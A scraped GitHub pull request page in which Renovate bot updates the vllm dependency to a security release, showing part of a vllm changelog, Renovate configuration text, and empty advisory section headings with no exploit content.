[MODEL] New model support for naver-hyperclovax/HyperCLOVAX-SEED-Vision-Instruct-3B by @bigshanedogg in https://github.com/vllm-project/vllm/pull/20931
[Frontend] Add request_id to the Request object so they can be controlled better via external load balancers by @kouroshHakha in https://github.com/vllm-project/vllm/pull/21009
[Model] Replace Mamba2 RMSNorm Gated with Fused Triton Kernel by @cyang49 in https://github.com/vllm-project/vllm/pull/20839
[ROCm][AITER] Enable fp8 kv cache on rocm aiter backend. by @fsx950223 in https://github.com/vllm-project/vllm/pull/20295
[Kernel] Improve machete memory bound perf by @czhu-cohere in https://github.com/vllm-project/vllm/pull/21556
Add support for Prithvi in Online serving mode by @mgazz in https://github.com/vllm-project/vllm/pull/21518
[CI] Unifying Dockerfiles for ARM and X86 Builds by @kebe7jun in https://github.com/vllm-project/vllm/pull/21343
[Docs] add auto-round quantization readme by @wenhuach21 in https://github.com/vllm-project/vllm/pull/21600
[TPU][Test] Rollback PR-21550. by @QiliangCui in [https://github.com/[TPU][Test] Rollback PR-21550. vllm-project/vllm#21619](https://redirect.github.com/vllm-pr

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

renovate bot mentioned this pull request Jun 17, 2025

Update dependency openai to v1.106.1 #6

Open

1 task

Update dependency vllm to v0.10.1.1 [SECURITY]

a8e0894

renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from dfe9935 to a8e0894 Compare August 21, 2025 19:05

renovate bot changed the title ~~Update dependency vllm to v0.9.0 [SECURITY]~~ Update dependency vllm to v0.10.1.1 [SECURITY] Aug 21, 2025

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Update dependency vllm to v0.10.1.1 [SECURITY] #8

Update dependency vllm to v0.10.1.1 [SECURITY] #8

renovate bot commented May 28, 2025 •

edited

Loading

Uh oh!

Uh oh!

Update dependency vllm to v0.10.1.1 [SECURITY] #8

Are you sure you want to change the base?

Update dependency vllm to v0.10.1.1 [SECURITY] #8

Conversation

renovate bot commented May 28, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

GitHub Vulnerability Alerts

Summary

Details

Impact

Fix

Summary

1. vllm/lora/utils.py Line 173

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

3. vllm/entrypoints/openai/serving_chat.py Line 351

4. benchmarks/benchmark_serving_structured_output.py Line 650

Fix

Description

Environment

Leakage

Results

Fixes

Summary

Details

Recommendation

Fixes

Summary

Details

PoC

Impact

Fix

Impact

Patches

Summary

Details

PoC

Impact

Fix

Summary

Details

Impact

Resolution

Release Notes

Highlights

Model Support

Engine Core

Hardware & Performance

Quantization

API & Frontend

Dependencies

V0 Deprecation

What's Changed

Configuration

Uh oh!

Uh oh!

renovate bot commented May 28, 2025 •

edited

Loading